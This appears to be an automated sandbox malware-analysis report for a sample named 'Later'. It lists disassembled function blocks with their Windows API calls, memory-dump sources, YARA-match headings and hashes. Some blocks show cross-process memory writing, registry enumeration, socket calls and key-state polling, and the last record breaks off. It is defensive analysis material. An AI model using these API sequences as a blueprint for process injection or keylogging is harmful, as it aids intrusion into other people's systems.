                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,940E2C7A,?,?,00000000,01502585,000000FF,?,014E91A3,?,?,014E9177,00000016), ref: 014E923E
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 014E9250
                                        • FreeLibrary.KERNEL32(00000000,?,00000000,01502585,000000FF,?,014E91A3,?,?,014E9177,00000016), ref: 014E9272
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 277f45d4753f13986f80e5f9c761def330f219506269f3c4f57d4bc4142c7694
                                        • Instruction ID: 83936579e51df3f36840dd92de8e41d71feef2f94b884b0fc5cbc91351ac5983
                                        • Opcode Fuzzy Hash: 277f45d4753f13986f80e5f9c761def330f219506269f3c4f57d4bc4142c7694
                                        • Instruction Fuzzy Hash: 7401A735904615EFDB228F94CC09BEEBBF8FB08715F010629F821A66D4DB749404CB80
                                        APIs
                                        • SysStringLen.OLEAUT32(?), ref: 014B99D7
                                        • SysStringLen.OLEAUT32(?), ref: 014B99F5
                                        • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 014B9A32
                                        • SysFreeString.OLEAUT32(-00000001), ref: 014B9ABF
                                        • _com_issue_error.COMSUPP ref: 014B9B0A
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocByteFree_com_issue_error
                                        • String ID:
                                        • API String ID: 2311277479-0
                                        • Opcode ID: ad3aa63cdb7173596f6b4d2c7d96d5ee6759d508f81bf9e85706198115bbec55
                                        • Instruction ID: 582fecf72f52b578d85fe9004d6f959b9136f10392893d85a7548768989242d8
                                        • Opcode Fuzzy Hash: ad3aa63cdb7173596f6b4d2c7d96d5ee6759d508f81bf9e85706198115bbec55
                                        • Instruction Fuzzy Hash: 1C5153B1A006079BEF10CF69C8C4BABB7A8AF55718F14451EE615DB3A0E775D400CBA0
                                        APIs
                                          • Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77
                                          • Part of subcall function 00C71242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C701D5,?,?), ref: 00C71259
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C70525
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C70564
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C705AB
                                        • RegCloseKey.ADVAPI32(?,?), ref: 00C705D7
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C705E4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3440857362-0
                                        • Opcode ID: 98cd5a09f792e69feb9e648047d7b04723e9cdeb466a45ab49ffe1180f4eddd0
                                        • Instruction ID: 5a92e189b887c55da5908e2e547aeca1f69b631b233ee52a82162a00c3791dae
                                        • Opcode Fuzzy Hash: 98cd5a09f792e69feb9e648047d7b04723e9cdeb466a45ab49ffe1180f4eddd0
                                        • Instruction Fuzzy Hash: 24511871208204AFD754EF64C891F6AB7E8FF84304F54891DF99A87292DB31EA08DB56
                                        APIs
                                          • Part of subcall function 00C6823D: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C68268
                                        • #23.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C66C4E
                                        • #111.WSOCK32(00000000), ref: 00C66C77
                                        • #2.WSOCK32(00000000,?,00000010), ref: 00C66CB0
                                        • #111.WSOCK32(00000000), ref: 00C66CBD
                                        • #3.WSOCK32(00000000,00000000), ref: 00C66CD1
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: #111
                                        • String ID:
                                        • API String ID: 568940515-0
                                        • Opcode ID: 78db2a8bdf2802d46276685913a346beb95a2727b17e91304e3db06ce2850be1
                                        • Instruction ID: 2ae61b0f3e960d564a6ca1aeafd8613aedc87ec2ea4c9ee9e81a86b5eaf4ef0a
                                        • Opcode Fuzzy Hash: 78db2a8bdf2802d46276685913a346beb95a2727b17e91304e3db06ce2850be1
                                        • Instruction Fuzzy Hash: 3A41B375600614AFDB20AF649886F7F77E8DF44710F048598FA55AB3D2CB709D048BA1
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C5EACF
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C5EAF8
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C5EB37
                                          • Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
                                          • Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C5EB5C
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C5EB64
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                        • String ID:
                                        • API String ID: 1389676194-0
                                        • Opcode ID: 527ba08a1bebe329360d59c1b742a1e2ee66519bd15e60a2492d0680ab6266b6
                                        • Instruction ID: f0aea9baf35a2afd62dd1bd5e924970c2fc31850d355dbcedbc18022fce7bd23
                                        • Opcode Fuzzy Hash: 527ba08a1bebe329360d59c1b742a1e2ee66519bd15e60a2492d0680ab6266b6
                                        • Instruction Fuzzy Hash: 6C513D39A00509DFCB05EF64C981EAEBBF5EF09311B148095E909AB362CB31EE55DB54
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32227cb63578a484e0fbaee74a5a3aff901401e8baf65861ef17c9c72aad9cf0
                                        • Instruction ID: f0aff2e5d4617ee075b92ffd9e19dd7611801731411d11db71ee9d10c72c2623
                                        • Opcode Fuzzy Hash: 32227cb63578a484e0fbaee74a5a3aff901401e8baf65861ef17c9c72aad9cf0
                                        • Instruction Fuzzy Hash: 2541C136900114AFC760DF68CC48FADBBA8FB89310F148155F92DA72E1D671AF40DB52
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00BF2727
                                        • ScreenToClient.USER32(00CB67B0,?), ref: 00BF2744
                                        • GetAsyncKeyState.USER32(?), ref: 00BF2769
                                        • GetAsyncKeyState.USER32(?), ref: 00BF2777
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: 49114ea2948989b5dde34f0aed94b12e1f15662420f74c016c65497995e238e5
                                        • Instruction ID: b727cbb76d62b651e3cfc5d8d22a5798f7dc31129fc6ded9820990abcce91ced
                                        • Opcode Fuzzy Hash: 49114ea2948989b5dde34f0aed94b12e1f15662420f74c016c65497995e238e5
                                        • Instruction Fuzzy Hash: 54415E75504119FFDF159FA4C884AEDBBB4FB05320F20435AF92897290CB30AE64EB91
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C0126
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C0146
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C0166
                                        • std::_Facet_Register.LIBCPMT ref: 014C0201
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C0219
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                        • String ID:
                                        • API String ID: 459529453-0
                                        • Opcode ID: 95e064a4d333a1547d11b23fcbef3dead2614dfc306e822f43c8448e500cd256
                                        • Instruction ID: f6e67d39b04a7dde2c88dcd366421accccbc3f31b8e6be4262c6366db2d35258
                                        • Opcode Fuzzy Hash: 95e064a4d333a1547d11b23fcbef3dead2614dfc306e822f43c8448e500cd256
                                        • Instruction Fuzzy Hash: E541CD79900215CFCB76DF99C480A6EB7B4FF54B10F15816EE806AB391CB71AA05CB81
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 2a874645088c6ecb5b7b76c70b040d8d6aec4c96a2b12d90d35b7ad1d59c9e8a
                                        • Instruction ID: 50e42a3f9e7f290b94f427989a8030896253f1eeb071187b00c94b082fcc1430
                                        • Opcode Fuzzy Hash: 2a874645088c6ecb5b7b76c70b040d8d6aec4c96a2b12d90d35b7ad1d59c9e8a
                                        • Instruction Fuzzy Hash: 4C01F1A2A071057BD20066129CC2FFBB71DAA92788B059022FE15D6262E625DF10A2A8
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C48AC1
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C48ACB
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C48ADA
                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C48AE1
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C48AF7
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: 80bcb9247fa1051621beb6aa308055793bea8d1e0f1a9cff4535b1e81edc5b9e
                                        • Instruction ID: 0488fb9693f0df25b34705f4b20dcc9bf0be97cbfb1a10de76e254483260b45d
                                        • Opcode Fuzzy Hash: 80bcb9247fa1051621beb6aa308055793bea8d1e0f1a9cff4535b1e81edc5b9e
                                        • Instruction Fuzzy Hash: 40F0A971200304AFEB900FA4AC8DF6F3BACFF8A769F200029F914C2160DB619C08DB64
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00C4CB73
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C4CB8A
                                        • MessageBeep.USER32(00000000), ref: 00C4CBA2
                                        • KillTimer.USER32(?,0000040A), ref: 00C4CBBE
                                        • EndDialog.USER32(?,00000001), ref: 00C4CBD8
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: 2170a60b971eda0359e3d57579aac2fc3f70974e9a7e8b71245935a8743bbd48
                                        • Instruction ID: d9863ca49215584b8d17cc3866d4b6e946f198e88dde6c7688137ebbb17b153a
                                        • Opcode Fuzzy Hash: 2170a60b971eda0359e3d57579aac2fc3f70974e9a7e8b71245935a8743bbd48
                                        • Instruction Fuzzy Hash: A601D630441708ABEB605B10DD8FFAA7778FF00705F000659F993610E1DBF06A588F94
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00C5C8E2
                                        • CoCreateInstance.OLE32(00C83D3C,00000000,00000001,00C83BAC,?), ref: 00C5C8FA
                                          • Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77
                                        • CoUninitialize.OLE32 ref: 00C5CB67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                        • String ID: .lnk
                                        • API String ID: 2683427295-24824748
                                        • Opcode ID: 087e5c981a5161000acf889e3cc4f5f97fa8f4c6265eebf4bf4f3396b80d5841
                                        • Instruction ID: 42eae954a63bd6f908ce0d88ecfe3b828399b3412cfa29c197e33a8df49d8006
                                        • Opcode Fuzzy Hash: 087e5c981a5161000acf889e3cc4f5f97fa8f4c6265eebf4bf4f3396b80d5841
                                        • Instruction Fuzzy Hash: 4BA12D71104205AFD300EF64C891EAFB7E8EF95718F04496CF65597292EB70EE49CB92
                                        APIs
                                          • Part of subcall function 00C10F16: std::exception::exception.LIBCMT ref: 00C10F4C
                                          • Part of subcall function 00C10F16: __CxxThrowException@8.LIBCMT ref: 00C10F61
                                          • Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77
                                          • Part of subcall function 00C01680: _memmove.LIBCMT ref: 00C016DB
                                        • __swprintf.LIBCMT ref: 00BFE598
                                        Strings
                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BFE431
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                        • API String ID: 1943609520-557222456
                                        • Opcode ID: 5b9b0334e4bd7b5426e52eb3e54ead836d963132a70489e340ae7006bcefef3f
                                        • Instruction ID: 0191d4d1f0c0274e43048392ad9b46c4973f1cd0f1fdf1ad44a69f53971262da
                                        • Opcode Fuzzy Hash: 5b9b0334e4bd7b5426e52eb3e54ead836d963132a70489e340ae7006bcefef3f
                                        • Instruction Fuzzy Hash: 53917C711182059FC714EF24C886CBEB7F4EF95704F04495EF9929B2A1EB20EE48DB92
                                        APIs
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 0140F9C1
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 0140F9D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_destroy
                                        • String ID: at line $, column
                                        • API String ID: 4194217158-191570568
                                        • Opcode ID: 5a9cd84a85f2deae5f560dc517357b6753a95906a50e4bed9410cb886a83a108
                                        • Instruction ID: 7171b6020b43e9a80f569637cc15949c74bc7b26aa1e112481560bd58b2ad825
                                        • Opcode Fuzzy Hash: 5a9cd84a85f2deae5f560dc517357b6753a95906a50e4bed9410cb886a83a108
                                        • Instruction Fuzzy Hash: 35613671A00215AFDB19CF69C880BAEBBF5FF59300F14453EE401A73A0D774A945CBA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$+
                                        • API String ID: 0-2552117581
                                        • Opcode ID: ba63d72a7eba985daecb388f569d80568adf9ec2c51e8fb6f78ea41305c152df
                                        • Instruction ID: 54a355075d8aeccf0bc4efff0a4f5c2c3401f4f33f59fc8eaa75ad6e59aaeb62
                                        • Opcode Fuzzy Hash: ba63d72a7eba985daecb388f569d80568adf9ec2c51e8fb6f78ea41305c152df
                                        • Instruction Fuzzy Hash: 2D510DB1104216CFDF15DF28C8406FABBA4BF56310F284056FCA19B294DB709EA2DB62
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID: %llu$%llu$string or blob too big
                                        • API String ID: 3732870572-3890766324
                                        • Opcode ID: 504c1ff4f9be4d000f385bb5d4e9c9514e7ce726aea631578e0152b82c65e213
                                        • Instruction ID: 36e27f8e380ae3126b6f95aaa25be1b87cff7ac7d580e5c5d1c92909d9e18656
                                        • Opcode Fuzzy Hash: 504c1ff4f9be4d000f385bb5d4e9c9514e7ce726aea631578e0152b82c65e213
                                        • Instruction Fuzzy Hash: EC413871A002106FE7209B29CC40B977BA0EF95730F18479DF9A49F3E2E671A940CB91
                                        APIs
                                          • Part of subcall function 00C51B27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C49C31,?,?,00000034,00000800,?,00000034), ref: 00C51B51
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C4A1DA
                                          • Part of subcall function 00C51AF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C49C60,?,?,00000800,?,00001073,00000000,?,?), ref: 00C51B1C
                                          • Part of subcall function 00C51A49: GetWindowThreadProcessId.USER32(?,?), ref: 00C51A74
                                          • Part of subcall function 00C51A49: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C49BF5,00000034,?,?,00001004,00000000,00000000), ref: 00C51A84
                                          • Part of subcall function 00C51A49: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C49BF5,00000034,?,?,00001004,00000000,00000000), ref: 00C51A9A
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C4A247
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C4A294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        • Opcode ID: ebb2f07a9d09896b9cf5cba3c74ef333e2b1e1e1c14c04916db8fbb7839d8edb
                                        • Instruction ID: 4e91c60108af2606841677b2501a06500c8ca9e80467ef0da7cd8d10041a9c65
                                        • Opcode Fuzzy Hash: ebb2f07a9d09896b9cf5cba3c74ef333e2b1e1e1c14c04916db8fbb7839d8edb
                                        • Instruction Fuzzy Hash: 86416B76901218AFCB20DFA4CC85BDEBBB8EB09300F104095FE55B7181DA716E89EB61
                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 014DCB43
                                        • CatchIt.LIBVCRUNTIME ref: 014DCC29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CatchEncodePointer
                                        • String ID: MOC$RCC
                                        • API String ID: 1435073870-2084237596
                                        • Opcode ID: 54a5f356a932f81bf7309febcedda4b70054330c8d8c4f297625cf12bc4a71b1
